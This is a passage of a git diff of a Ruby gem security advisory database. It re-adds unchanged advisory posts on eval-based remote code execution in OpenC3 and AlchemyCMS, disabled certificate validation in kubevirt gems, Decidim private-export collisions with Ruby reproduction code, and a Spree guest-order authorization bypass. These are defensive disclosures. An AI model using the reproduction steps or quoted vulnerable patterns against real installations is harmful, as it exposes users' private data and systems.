-    Because the cmd code path parses the command string before calling
-    authorize(), an unauthenticated attacker can trigger Ruby code
-    execution even though the request ultimately fails authorization (401).
-  cvss_v3: 10.0
-  unaffected_versions:
-  - "< 5.0.6"
-  patched_versions:
-  - ">= 6.10.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-68271
-    - https://github.com/OpenC3/cosmos/security/advisories/GHSA-w757-4qv9-mghp
-    - https://github.com/OpenC3/cosmos/commit/01e9fbc5e66e9a2500b71a75a44775dd1fc2d1de
-    - https://github.com/advisories/GHSA-w757-4qv9-mghp
----
+---
+layout: advisory
+title: 'CVE-2025-68271 (openc3): openc3-api Vulnerable to Unauthenticated Remote Code
+  Execution'
+comments: false
+categories:
+- openc3
+advisory:
+  gem: openc3
+  cve: 2025-68271
+  ghsa: w757-4qv9-mghp
+  url: https://github.com/OpenC3/cosmos/security/advisories/GHSA-w757-4qv9-mghp
+  title: openc3-api Vulnerable to Unauthenticated Remote Code Execution
+  date: 2026-01-13
+  description: |
+    ### Summary
+
+    OpenC3 COSMOS contains a critical remote code execution vulnerability
+    reachable through the JSON-RPC API. When a JSON-RPC request uses the
+    string form of certain APIs, attacker-controlled parameter text is
+    parsed into values using String#convert_to_value. For array-like
+    inputs, convert_to_value executes eval().
+
+    Because the cmd code path parses the command string before calling
+    authorize(), an unauthenticated attacker can trigger Ruby code
+    execution even though the request ultimately fails authorization (401).
+  cvss_v3: 10.0
+  unaffected_versions:
+  - "< 5.0.6"
+  patched_versions:
+  - ">= 6.10.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-68271
+    - https://github.com/OpenC3/cosmos/security/advisories/GHSA-w757-4qv9-mghp
+    - https://github.com/OpenC3/cosmos/commit/01e9fbc5e66e9a2500b71a75a44775dd1fc2d1de
+    - https://github.com/advisories/GHSA-w757-4qv9-mghp
+---
diff --git a/advisories/_posts/2026-01-21-CVE-2026-23885.md b/advisories/_posts/2026-01-21-CVE-2026-23885.md
index 06aee149..37fcc40c 100644
--- a/advisories/_posts/2026-01-21-CVE-2026-23885.md
+++ b/advisories/_posts/2026-01-21-CVE-2026-23885.md
@@ -1,53 +1,53 @@
----
-layout: advisory
-title: 'CVE-2026-23885 (alchemy_cms): AlchemyCMS - Authenticated Remote Code Execution
-  (RCE) via eval injection in ResourcesHelper'
-comments: false
-categories:
-- alchemy_cms
-advisory:
-  gem: alchemy_cms
-  cve: 2026-23885
-  ghsa: 2762-657x-v979
-  url: https://github.com/AlchemyCMS/alchemy_cms/security/advisories/GHSA-2762-657x-v979
-  title: AlchemyCMS - Authenticated Remote Code Execution (RCE) via eval injection
-    in ResourcesHelper
-  date: 2026-01-21
-  description: |
-    ### Summary
-
-    A vulnerability was discovered during a manual security audit
-    of the AlchemyCMS source code. The application uses the Ruby
-    `eval()` function to dynamically execute a string provided by the
-    `resource_handler.engine_name` attribute in
-    `Alchemy::ResourcesHelper#resource_url_proxy`.
-
-    ### Details
-
-    The vulnerability exists in `app/helpers/alchemy/resources_helper.rb`
-    at line 28. The code explicitly bypasses security linting with
-    `# rubocop:disable Security/Eval`, indicating that the use of a
-    dangerous function was known but not properly mitigated.
-
-    Since `engine_name` is sourced from module definitions that can be
-    influenced by administrative configurations, it allows an authenticated
-    attacker to escape the Ruby sandbox and execute arbitrary system
-    commands on the host OS.
-
-    But, for this attack to be possible local file access to the alchemy
-    project or the source on a remote server is necessary in order to
-    manipulate the module config file, though.
-  cvss_v3: 6.6
-  patched_versions:
-  - "~> 7.4.12"
-  - ">= 8.0.3"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-23885
-    - https://github.com/AlchemyCMS/alchemy_cms/security/advisories/GHSA-2762-657x-v979
-    - https://github.com/AlchemyCMS/alchemy_cms/commit/55d03ec600fd9e07faae1138b923790028917d26
-    - https://github.com/AlchemyCMS/alchemy_cms/commit/563c4ce45bf5813b7823bf3403ca1fc32cb769e7
-    - https://github.com/AlchemyCMS/alchemy_cms/releases/tag/v7.4.12
-    - https://github.com/AlchemyCMS/alchemy_cms/releases/tag/v8.0.3
-    - https://github.com/advisories/GHSA-2762-657x-v979
----
+---
+layout: advisory
+title: 'CVE-2026-23885 (alchemy_cms): AlchemyCMS - Authenticated Remote Code Execution
+  (RCE) via eval injection in ResourcesHelper'
+comments: false
+categories:
+- alchemy_cms
+advisory:
+  gem: alchemy_cms
+  cve: 2026-23885
+  ghsa: 2762-657x-v979
+  url: https://github.com/AlchemyCMS/alchemy_cms/security/advisories/GHSA-2762-657x-v979
+  title: AlchemyCMS - Authenticated Remote Code Execution (RCE) via eval injection
+    in ResourcesHelper
+  date: 2026-01-21
+  description: |
+    ### Summary
+
+    A vulnerability was discovered during a manual security audit
+    of the AlchemyCMS source code. The application uses the Ruby
+    `eval()` function to dynamically execute a string provided by the
+    `resource_handler.engine_name` attribute in
+    `Alchemy::ResourcesHelper#resource_url_proxy`.
+
+    ### Details
+
+    The vulnerability exists in `app/helpers/alchemy/resources_helper.rb`
+    at line 28. The code explicitly bypasses security linting with
+    `# rubocop:disable Security/Eval`, indicating that the use of a
+    dangerous function was known but not properly mitigated.
+
+    Since `engine_name` is sourced from module definitions that can be
+    influenced by administrative configurations, it allows an authenticated
+    attacker to escape the Ruby sandbox and execute arbitrary system
+    commands on the host OS.
+
+    But, for this attack to be possible local file access to the alchemy
+    project or the source on a remote server is necessary in order to
+    manipulate the module config file, though.
+  cvss_v3: 6.6
+  patched_versions:
+  - "~> 7.4.12"
+  - ">= 8.0.3"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-23885
+    - https://github.com/AlchemyCMS/alchemy_cms/security/advisories/GHSA-2762-657x-v979
+    - https://github.com/AlchemyCMS/alchemy_cms/commit/55d03ec600fd9e07faae1138b923790028917d26
+    - https://github.com/AlchemyCMS/alchemy_cms/commit/563c4ce45bf5813b7823bf3403ca1fc32cb769e7
+    - https://github.com/AlchemyCMS/alchemy_cms/releases/tag/v7.4.12
+    - https://github.com/AlchemyCMS/alchemy_cms/releases/tag/v8.0.3
+    - https://github.com/advisories/GHSA-2762-657x-v979
+---
diff --git a/advisories/_posts/2026-02-02-CVE-2026-1530.md b/advisories/_posts/2026-02-02-CVE-2026-1530.md
index 22582b70..591c56dc 100644
--- a/advisories/_posts/2026-02-02-CVE-2026-1530.md
+++ b/advisories/_posts/2026-02-02-CVE-2026-1530.md
@@ -1,37 +1,37 @@
----
-layout: advisory
-title: 'CVE-2026-1530 (fog-kubevirt): fog-kubevirt allows remote attacker to perform
-  MITM attack due to disabled certificate validation'
-comments: false
-categories:
-- fog-kubevirt
-advisory:
-  gem: fog-kubevirt
-  cve: 2026-1530
-  ghsa: m3hq-3qj8-c5fm
-  url: https://access.redhat.com/security/cve/CVE-2026-1530
-  title: fog-kubevirt allows remote attacker to perform MITM attack due to disabled
-    certificate validation
-  date: 2026-02-02
-  description: |
-    A flaw was found in fog-kubevirt. This vulnerability allows a remote
-    attacker to perform a Man-in-the-Middle (MITM) attack due to disabled
-    certificate validation. This enables the attacker to intercept and
-    potentially alter sensitive communications between Satellite and
-    OpenShift, resulting in information disclosure and data integrity
-    compromise.
-  cvss_v3: 8.1
-  patched_versions:
-  - ">= 1.5.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-1530
-    - https://github.com/fog/fog-kubevirt/releases/tag/v1.5.1
-    - https://github.com/fog/fog-kubevirt/blob/8adb03e07972d6e19a7713ecf2a827aa2cfe4b9e/CHANGELOG.md?plain=1#L11
-    - https://github.com/fog/fog-kubevirt/pull/168
-    - https://github.com/fog/fog-kubevirt/commit/8371e9ded99f9ec3e74caf2f283836109763e450
-    - https://github.com/fog/fog-kubevirt/commit/9603d79a239a0f68bedfc679cd1b65fbf6ec4753
-    - https://access.redhat.com/security/cve/CVE-2026-1530
-    - https://bugzilla.redhat.com/show_bug.cgi?id=2433784
-    - https://github.com/advisories/GHSA-m3hq-3qj8-c5fm
----
+---
+layout: advisory
+title: 'CVE-2026-1530 (fog-kubevirt): fog-kubevirt allows remote attacker to perform
+  MITM attack due to disabled certificate validation'
+comments: false
+categories:
+- fog-kubevirt
+advisory:
+  gem: fog-kubevirt
+  cve: 2026-1530
+  ghsa: m3hq-3qj8-c5fm
+  url: https://access.redhat.com/security/cve/CVE-2026-1530
+  title: fog-kubevirt allows remote attacker to perform MITM attack due to disabled
+    certificate validation
+  date: 2026-02-02
+  description: |
+    A flaw was found in fog-kubevirt. This vulnerability allows a remote
+    attacker to perform a Man-in-the-Middle (MITM) attack due to disabled
+    certificate validation. This enables the attacker to intercept and
+    potentially alter sensitive communications between Satellite and
+    OpenShift, resulting in information disclosure and data integrity
+    compromise.
+  cvss_v3: 8.1
+  patched_versions:
+  - ">= 1.5.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-1530
+    - https://github.com/fog/fog-kubevirt/releases/tag/v1.5.1
+    - https://github.com/fog/fog-kubevirt/blob/8adb03e07972d6e19a7713ecf2a827aa2cfe4b9e/CHANGELOG.md?plain=1#L11
+    - https://github.com/fog/fog-kubevirt/pull/168
+    - https://github.com/fog/fog-kubevirt/commit/8371e9ded99f9ec3e74caf2f283836109763e450
+    - https://github.com/fog/fog-kubevirt/commit/9603d79a239a0f68bedfc679cd1b65fbf6ec4753
+    - https://access.redhat.com/security/cve/CVE-2026-1530
+    - https://bugzilla.redhat.com/show_bug.cgi?id=2433784
+    - https://github.com/advisories/GHSA-m3hq-3qj8-c5fm
+---
diff --git a/advisories/_posts/2026-02-02-CVE-2026-1531.md b/advisories/_posts/2026-02-02-CVE-2026-1531.md
index b3e7ba45..3d69f352 100644
--- a/advisories/_posts/2026-02-02-CVE-2026-1531.md
+++ b/advisories/_posts/2026-02-02-CVE-2026-1531.md
@@ -1,34 +1,34 @@
----
-layout: advisory
-title: 'CVE-2026-1531 (foreman_kubevirt): foreman_kubevirt disables SSL verification
-  if a Certificate Authority (CA) certificate is not explicitly set'
-comments: false
-categories:
-- foreman_kubevirt
-advisory:
-  gem: foreman_kubevirt
-  cve: 2026-1531
-  ghsa: 2qxw-7fmx-gqfm
-  url: https://access.redhat.com/security/cve/CVE-2026-1531
-  title: foreman_kubevirt disables SSL verification if a Certificate Authority (CA)
-    certificate is not explicitly set
-  date: 2026-02-02
-  description: |
-    A flaw was found in foreman_kubevirt. When configuring the connection
-    to OpenShift, the system disables SSL verification if a Certificate
-    Authority (CA) certificate is not explicitly set. This insecure
-    default allows a remote attacker, capable of intercepting network
-    traffic between Satellite and OpenShift, to perform a Man-in-the-Middle
-    (MITM) attack. Such an attack could lead to the disclosure or
-    alteration of sensitive information.
-  cvss_v3: 8.1
-  patched_versions:
-  - ">= 0.4.3"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-1531
-    - https://github.com/theforeman/foreman_kubevirt/commit/6c9973ee59c6fbec65f165eb9ea9dd4ebb6eeef1
-    - https://access.redhat.com/security/cve/CVE-2026-1531
-    - https://bugzilla.redhat.com/show_bug.cgi?id=2433786
-    - https://github.com/advisories/GHSA-2qxw-7fmx-gqfm
----
+---
+layout: advisory
+title: 'CVE-2026-1531 (foreman_kubevirt): foreman_kubevirt disables SSL verification
+  if a Certificate Authority (CA) certificate is not explicitly set'
+comments: false
+categories:
+- foreman_kubevirt
+advisory:
+  gem: foreman_kubevirt
+  cve: 2026-1531
+  ghsa: 2qxw-7fmx-gqfm
+  url: https://access.redhat.com/security/cve/CVE-2026-1531
+  title: foreman_kubevirt disables SSL verification if a Certificate Authority (CA)
+    certificate is not explicitly set
+  date: 2026-02-02
+  description: |
+    A flaw was found in foreman_kubevirt. When configuring the connection
+    to OpenShift, the system disables SSL verification if a Certificate
+    Authority (CA) certificate is not explicitly set. This insecure
+    default allows a remote attacker, capable of intercepting network
+    traffic between Satellite and OpenShift, to perform a Man-in-the-Middle
+    (MITM) attack. Such an attack could lead to the disclosure or
+    alteration of sensitive information.
+  cvss_v3: 8.1
+  patched_versions:
+  - ">= 0.4.3"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-1531
+    - https://github.com/theforeman/foreman_kubevirt/commit/6c9973ee59c6fbec65f165eb9ea9dd4ebb6eeef1
+    - https://access.redhat.com/security/cve/CVE-2026-1531
+    - https://bugzilla.redhat.com/show_bug.cgi?id=2433786
+    - https://github.com/advisories/GHSA-2qxw-7fmx-gqfm
+---
diff --git a/advisories/_posts/2026-02-03-CVE-2025-65017.md b/advisories/_posts/2026-02-03-CVE-2025-65017.md
index 39845239..e36dd856 100644
--- a/advisories/_posts/2026-02-03-CVE-2025-65017.md
+++ b/advisories/_posts/2026-02-03-CVE-2025-65017.md
@@ -1,140 +1,140 @@
----
-layout: advisory
-title: 'CVE-2025-65017 (decidim): Decidim''s private data exports can lead to data
-  leaks'
-comments: false
-categories:
-- decidim
-advisory:
-  gem: decidim
-  cve: 2025-65017
-  ghsa: 3cx6-j9j4-54mp
-  url: https://github.com/decidim/decidim/security/advisories/GHSA-3cx6-j9j4-54mp
-  title: Decidim's private data exports can lead to data leaks
-  date: 2026-02-03
-  description: |
-    ### Impact
-
-    Private data exports can lead to data leaks in cases where the UUID
-    generation causes collisions for the generated UUIDs.
-
-    The bug was introduced by #13571 and affects Decidim versions 0.30.0
-    or newer (currently 2025-09-23).
-
-    This issue  was discovered by running the following spec several
-    times in a row, as it can randomly fail due to this bug:
-
-    ```bash
-    $ cd decidim-core
-    $ for i in {1..10}; do bundle exec rspec
-      spec/jobs/decidim/download_your_data_export_job_spec.rb
-      -e "deletes the" || break ; done
-    ```
-
-    Run the spec as many times as needed to hit a UUID that converts
-    to `0` through `.to_i`.
-
-    The UUID to zero conversion does not cause a security issue but
-    the security issue is demonstrated with the following example.
-
-    The following code regenerates the issue by assigning a predefined
-    UUID that will generate a collision (example assumes there are
-    already two existing users in the system):
-
-    ```ruby
-    # Create the ZIP buffers to be stored
-    buffer1 = Zip::OutputStream.write_buffer do |out|
-      out.put_next_entry("admin.txt")
-      out.write "Hello, admin!"
-    end
-    buffer1.rewind
-    buffer2 = Zip::OutputStream.write_buffer do |out|
-      out.put_next_entry("user.txt")
-      out.write "Hello, user!"
-    end
-    buffer2.rewind
-
-    # Create the private exports with a predefined IDs
-    user1 = Decidim::User.find(1)
-    export = user1.private_exports.build
-    export.id = "0210ae70-482b-4671-b758-35e13e0097a9"
-    export.export_type = "download_your_data"
-    export.file.attach(io: buffer1, filename: "foobar.zip",
-      content_type: "application/zip")
-    export.expires_at = Decidim.download_your_data_expiry_time.from_now
-    export.metadata = {}
-    export.save!
-
-    user2 = Decidim::User.find(2)
-    export = user2.private_exports.build
-    export.id = "0210d2df-a0c7-40aa-ad97-2dae5083e3b8"
-    export.export_type = "download_your_data"
-    export.file.attach(io: buffer2, filename: "foobar.zip",
-      content_type: "application/zip")
-    export.expires_at = Decidim.download_your_data_expiry_time.from_now
-    export.metadata = {}
-    export.save!
-    ```
-
-    Expect to see an error in the situation.
-
-    Now, login as user with ID 1, go to `/download_your_data`, click
-    "Download file" from the export and expect to see the data that
-    should be attached to user with ID 2. This is an artificially
-    replicated situation with the predefined UUIDs but it can easily
-    happen in real situations.
-
-    The reason for the test case failure can be replicated in case
-    you change the export ID to
-      `export.id = "e9540f96-9e3d-4abe-8c2a-6c338d85a684"`.
-    This would return `0` through `.to_s`
-
-    After attaching that ID, you can test if the file is available
-    for the export:
-
-    ```ruby
-    user.private_exports.last.file.attached?
-    => false
-    user.private_exports.last.file.blob
-    => nil
-    ```
-
-    Note that this fails with such UUID as shown in the example and
-    could easily lead to collisions in case the UUID starts with a
-    number. E.g. UUID `"0210ae70-482b-4671-b758-35e13e0097a9"` would
-    convert to `210` through `.to_s`. Therefore, if someone else has
-    a "private" export with the prefixes "00000210", "0000210",
-    "000210", "00210", "0210" or "210", that would cause a collision
-    and the file could be attached to the wrong private export.
-
-    Theoretical chance of collision (the reality depends on the
-    UUID generation algorithm):
-
-    - Potential combinations of the UUID first part (8 characters hex): 16^8
-    - Potentially colliding character combinations (8 numbers
-      characters in the range of 0-9): 10^8
-    - 10^8 / 16^8 ≈ 2.3 (23 / 1000 users)
-
-    The root cause is that the class `Decidim::PrivateExport` defines
-    an ActiveStorage relation to `file` and the table
-    `active_storage_attachments` stores the related `record_id` as
-    `bigint` which causes the conversion to happen.
-
-    ### Workarounds
-
-    Fully disable the private exports feature until a patch is available.
-  cvss_v4: 8.2
-  unaffected_versions:
-  - "< 0.30.0"
-  patched_versions:
-  - "~> 0.30.4"
-  - ">= 0.31.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-65017
-    - https://github.com/decidim/decidim/security/advisories/GHSA-3cx6-j9j4-54mp
-    - https://github.com/decidim/decidim/releases/tag/v0.31.0
-    - https://github.com/decidim/decidim/releases/tag/v0.30.4
-    - https://github.com/decidim/decidim/pull/13571
-    - https://github.com/advisories/GHSA-3cx6-j9j4-54mp
----
+---
+layout: advisory
+title: 'CVE-2025-65017 (decidim): Decidim''s private data exports can lead to data
+  leaks'
+comments: false
+categories:
+- decidim
+advisory:
+  gem: decidim
+  cve: 2025-65017
+  ghsa: 3cx6-j9j4-54mp
+  url: https://github.com/decidim/decidim/security/advisories/GHSA-3cx6-j9j4-54mp
+  title: Decidim's private data exports can lead to data leaks
+  date: 2026-02-03
+  description: |
+    ### Impact
+
+    Private data exports can lead to data leaks in cases where the UUID
+    generation causes collisions for the generated UUIDs.
+
+    The bug was introduced by #13571 and affects Decidim versions 0.30.0
+    or newer (currently 2025-09-23).
+
+    This issue  was discovered by running the following spec several
+    times in a row, as it can randomly fail due to this bug:
+
+    ```bash
+    $ cd decidim-core
+    $ for i in {1..10}; do bundle exec rspec
+      spec/jobs/decidim/download_your_data_export_job_spec.rb
+      -e "deletes the" || break ; done
+    ```
+
+    Run the spec as many times as needed to hit a UUID that converts
+    to `0` through `.to_i`.
+
+    The UUID to zero conversion does not cause a security issue but
+    the security issue is demonstrated with the following example.
+
+    The following code regenerates the issue by assigning a predefined
+    UUID that will generate a collision (example assumes there are
+    already two existing users in the system):
+
+    ```ruby
+    # Create the ZIP buffers to be stored
+    buffer1 = Zip::OutputStream.write_buffer do |out|
+      out.put_next_entry("admin.txt")
+      out.write "Hello, admin!"
+    end
+    buffer1.rewind
+    buffer2 = Zip::OutputStream.write_buffer do |out|
+      out.put_next_entry("user.txt")
+      out.write "Hello, user!"
+    end
+    buffer2.rewind
+
+    # Create the private exports with a predefined IDs
+    user1 = Decidim::User.find(1)
+    export = user1.private_exports.build
+    export.id = "0210ae70-482b-4671-b758-35e13e0097a9"
+    export.export_type = "download_your_data"
+    export.file.attach(io: buffer1, filename: "foobar.zip",
+      content_type: "application/zip")
+    export.expires_at = Decidim.download_your_data_expiry_time.from_now
+    export.metadata = {}
+    export.save!
+
+    user2 = Decidim::User.find(2)
+    export = user2.private_exports.build
+    export.id = "0210d2df-a0c7-40aa-ad97-2dae5083e3b8"
+    export.export_type = "download_your_data"
+    export.file.attach(io: buffer2, filename: "foobar.zip",
+      content_type: "application/zip")
+    export.expires_at = Decidim.download_your_data_expiry_time.from_now
+    export.metadata = {}
+    export.save!
+    ```
+
+    Expect to see an error in the situation.
+
+    Now, login as user with ID 1, go to `/download_your_data`, click
+    "Download file" from the export and expect to see the data that
+    should be attached to user with ID 2. This is an artificially
+    replicated situation with the predefined UUIDs but it can easily
+    happen in real situations.
+
+    The reason for the test case failure can be replicated in case
+    you change the export ID to
+      `export.id = "e9540f96-9e3d-4abe-8c2a-6c338d85a684"`.
+    This would return `0` through `.to_s`
+
+    After attaching that ID, you can test if the file is available
+    for the export:
+
+    ```ruby
+    user.private_exports.last.file.attached?
+    => false
+    user.private_exports.last.file.blob
+    => nil
+    ```
+
+    Note that this fails with such UUID as shown in the example and
+    could easily lead to collisions in case the UUID starts with a
+    number. E.g. UUID `"0210ae70-482b-4671-b758-35e13e0097a9"` would
+    convert to `210` through `.to_s`. Therefore, if someone else has
+    a "private" export with the prefixes "00000210", "0000210",
+    "000210", "00210", "0210" or "210", that would cause a collision
+    and the file could be attached to the wrong private export.
+
+    Theoretical chance of collision (the reality depends on the
+    UUID generation algorithm):
+
+    - Potential combinations of the UUID first part (8 characters hex): 16^8
+    - Potentially colliding character combinations (8 numbers
+      characters in the range of 0-9): 10^8
+    - 10^8 / 16^8 ≈ 2.3 (23 / 1000 users)
+
+    The root cause is that the class `Decidim::PrivateExport` defines
+    an ActiveStorage relation to `file` and the table
+    `active_storage_attachments` stores the related `record_id` as
+    `bigint` which causes the conversion to happen.
+
+    ### Workarounds
+
+    Fully disable the private exports feature until a patch is available.
+  cvss_v4: 8.2
+  unaffected_versions:
+  - "< 0.30.0"
+  patched_versions:
+  - "~> 0.30.4"
+  - ">= 0.31.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-65017
+    - https://github.com/decidim/decidim/security/advisories/GHSA-3cx6-j9j4-54mp
+    - https://github.com/decidim/decidim/releases/tag/v0.31.0
+    - https://github.com/decidim/decidim/releases/tag/v0.30.4
+    - https://github.com/decidim/decidim/pull/13571
+    - https://github.com/advisories/GHSA-3cx6-j9j4-54mp
+---
diff --git a/advisories/_posts/2026-02-05-CVE-2026-25757.md b/advisories/_posts/2026-02-05-CVE-2026-25757.md
index 7427f1de..8683ef8a 100644
--- a/advisories/_posts/2026-02-05-CVE-2026-25757.md
+++ b/advisories/_posts/2026-02-05-CVE-2026-25757.md
@@ -1,90 +1,90 @@
----
-layout: advisory
-title: 'CVE-2026-25757 (spree_storefront): Unauthenticated Spree Commerce users can
-  view completed guest orders by Order ID'
-comments: false
-categories:
-- spree_storefront
-advisory:
-  gem: spree_storefront
-  cve: 2026-25757
-  ghsa: p6pv-q7rc-g4h9
-  url: https://github.com/spree/spree/security/advisories/GHSA-p6pv-q7rc-g4h9
-  title: Unauthenticated Spree Commerce users can view completed guest orders by Order
-    ID
-  date: 2026-02-05
-  description: |
-    ### Unauthenticated users can view completed guest orders by Order ID (`GHSL-2026-029`)
-
-    The `OrdersController#show` action permits viewing completed
-    guest orders by order number alone, without requiring the
-    associated order token.
-
-    Order lookup without enforcing token requirement in
-    [`OrdersController#show`](https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/storefront/app/controllers/spree/orders_controller.rb#L14):
-
-    ```ruby
-    @order = complete_order_finder.new(number: params[:id],
-      token: params[:token], store: current_store).execute.first
-    ```
-
-    Authorization bypass for guest orders in [`authorize_access`](https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/storefront/app/controllers/spree/orders_controller.rb#L51C1-L55C8):
-
-    ```ruby
-    def authorize_access
-      return true if @order.user_id.nil?
-
-      @order.user == try_spree_current_user
-    end
-    ```
-
-    If the attacker is in possession of a leaked Order ID, they might
-    look it up directly via this API.
-    Alternatively, brute forcing all or parts of the possible Order IDs
-    might be feasible for an attacker. (The Order IDs themselves are
-    [securely generated](https://github.com/spree/spree/blob/a878eb4a782ce0445d218ea86fb12075b0e3d7cc/core/lib/spree/core/number_generator.rb#L45),
-    but with relatively low entropy: by default an order ID has a length
-    of 9 and a base of 10, that would require an attacker to perform
-    1 billion requests to gather all guest orders. (At an assumed
-    constant rate of 100 requests per second it would take 115 days.)
-
-    #### Impact
-
-    This issue may lead to disclosure of PII of guest users
-    (including names, addresses and phone numbers).
-
-    #### CWEs
-
-    - CWE-639: Authorization Bypass Through User-Controlled Key
-
-    ### Credit
-
-    This issue was discovered with the [GitHub Security Lab Taskflow Agent](https://github.com/GitHubSecurityLab/seclab-taskflow-agent)
-    and manually verified by GHSL team members
-    [@p- (Peter Stöckli)](https://github.com/p-) and
-    [@m-y-mo (Man Yue Mo)](https://github.com/m-y-mo).
-
-    ### Disclosure Policy
-
-    This report is subject to a 90-day disclosure deadline, as
-    described in more detail in our [coordinated disclosure policy](https://securitylab.github.com/advisories#policy).
-  cvss_v4: 7.7
-  patched_versions:
-  - "~> 5.0.8"
-  - "~> 5.1.10"
-  - "~> 5.2.7"
-  - ">= 5.3.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-25757
-    - https://github.com/spree/spree/security/advisories/GHSA-p6pv-q7rc-g4h9
-    - https://github.com/spree/spree/commit/3e00be64c128ef4bd4b99731f0c3ab469509cfab
-    - https://github.com/spree/spree/commit/6b32ed7d474aa55fa441990e6aa39740152aa1be
-    - https://github.com/spree/spree/commit/6f6b8a7a28a8bff24a6e20eab04b4bbbdf39384d
-    - https://github.com/spree/spree/commit/ea4a5db590ca753dbc986f2a4e818d9e0edfb1ad
-    - https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/storefront/app/controllers/spree/orders_controller.rb#L14
-    - https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/storefront/app/controllers/spree/orders_controller.rb#L51C1-L55C8
-    - https://github.com/spree/spree/blob/a878eb4a782ce0445d218ea86fb12075b0e3d7cc/core/lib/spree/core/number_generator.rb#L45
-    - https://advisories.gitlab.com/pkg/gem/spree_storefront/CVE-2026-25757
-    - https://github.com/advisories/GHSA-p6pv-q7rc-g4h9
----
+---
+layout: advisory
+title: 'CVE-2026-25757 (spree_storefront): Unauthenticated Spree Commerce users can
+  view completed guest orders by Order ID'
+comments: false
+categories:
+- spree_storefront
+advisory:
+  gem: spree_storefront
+  cve: 2026-25757
+  ghsa: p6pv-q7rc-g4h9
+  url: https://github.com/spree/spree/security/advisories/GHSA-p6pv-q7rc-g4h9
+  title: Unauthenticated Spree Commerce users can view completed guest orders by Order
+    ID
+  date: 2026-02-05
+  description: |
+    ### Unauthenticated users can view completed guest orders by Order ID (`GHSL-2026-029`)
+
+    The `OrdersController#show` action permits viewing completed
+    guest orders by order number alone, without requiring the
+    associated order token.
+
+    Order lookup without enforcing token requirement in
+    [`OrdersController#show`](https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/storefront/app/controllers/spree/orders_controller.rb#L14):
+
+    ```ruby
+    @order = complete_order_finder.new(number: params[:id],
+      token: params[:token], store: current_store).execute.first
+    ```
+
+    Authorization bypass for guest orders in [`authorize_access`](https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/storefront/app/controllers/spree/orders_controller.rb#L51C1-L55C8):
+
+    ```ruby
+    def authorize_access
+      return true if @order.user_id.nil?
+
+      @order.user == try_spree_current_user
+    end
+    ```
+
+    If the attacker is in possession of a leaked Order ID, they might
+    look it up directly via this API.
+    Alternatively, brute forcing all or parts of the possible Order IDs
+    might be feasible for an attacker. (The Order IDs themselves are
+    [securely generated](https://github.com/spree/spree/blob/a878eb4a782ce0445d218ea86fb12075b0e3d7cc/core/lib/spree/core/number_generator.rb#L45),
+    but with relatively low entropy: by default an order ID has a length
+    of 9 and a base of 10, that would require an attacker to perform
+    1 billion requests to gather all guest orders. (At an assumed
+    constant rate of 100 requests per second it would take 115 days.)
+
+    #### Impact
+
+    This issue may lead to disclosure of PII of guest users
+    (including names, addresses and phone numbers).
+
+    #### CWEs
+
+    - CWE-639: Authorization Bypass Through User-Controlled Key
+
+    ### Credit
+
+    This issue was discovered with the [GitHub Security Lab Taskflow Agent](https://github.com/GitHubSecurityLab/seclab-taskflow-agent)
+    and manually verified by GHSL team members
+    [@p- (Peter Stöckli)](https://github.com/p-) and
+    [@m-y-mo (Man Yue Mo)](https://github.com/m-y-mo).
+
+    ### Disclosure Policy
+
+    This report is subject to a 90-day disclosure deadline, as
+    described in more detail in our [coordinated disclosure policy](https://securitylab.github.com/advisories#policy).
+  cvss_v4: 7.7
+  patched_versions:
+  - "~> 5.0.8"
+  - "~> 5.1.10"
+  - "~> 5.2.7"
+  - ">= 5.3.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-25757
+    - https://github.com/spree/spree/security/advisories/GHSA-p6pv-q7rc-g4h9
+    - https://github.com/spree/spree/commit/3e00be64c128ef4bd4b99731f0c3ab469509cfab
+    - https://github.com/spree/spree/commit/6b32ed7d474aa55fa441990e6aa39740152aa1be
+    - https://github.com/spree/spree/commit/6f6b8a7a28a8bff24a6e20eab04b4bbbdf39384d
+    - https://github.com/spree/spree/commit/ea4a5db590ca753dbc986f2a4e818d9e0edfb1ad
+    - https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/storefront/app/controllers/spree/orders_controller.rb#L14
+    - https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/storefront/app/controllers/spree/orders_controller.rb#L51C1-L55C8
+    - https://github.com/spree/spree/blob/a878eb4a782ce0445d218ea86fb12075b0e3d7cc/core/lib/spree/core/number_generator.rb#L45
+    - https://advisories.gitlab.com/pkg/gem/spree_storefront/CVE-2026-25757
+    - https://github.com/advisories/GHSA-p6pv-q7rc-g4h9
+---
diff --git a/advisories/_posts/2026-02-05-CVE-2026-25758.md b/advisories/_posts/2026-02-05-CVE-2026-25758.md
index 11ef8864..a0cda8e6 100644
--- a/advisories/_posts/2026-02-05-CVE-2026-25758.md
+++ b/advisories/_posts/2026-02-05-CVE-2026-25758.md
@@ -1,106 +1,106 @@
----
-layout: advisory
-title: 'CVE-2026-25758 (spree_api): Unauthenticated Spree Commerce users can access
-  all guest addresses'
-comments: false
-categories:
-- spree_api
-advisory:
-  gem: spree_api
-  cve: 2026-25758
-  ghsa: 87fh-rc96-6fr6
-  url: https://github.com/spree/spree/security/advisories/GHSA-87fh-rc96-6fr6
-  title: Unauthenticated Spree Commerce users can access all guest addresses
-  date: 2026-02-05
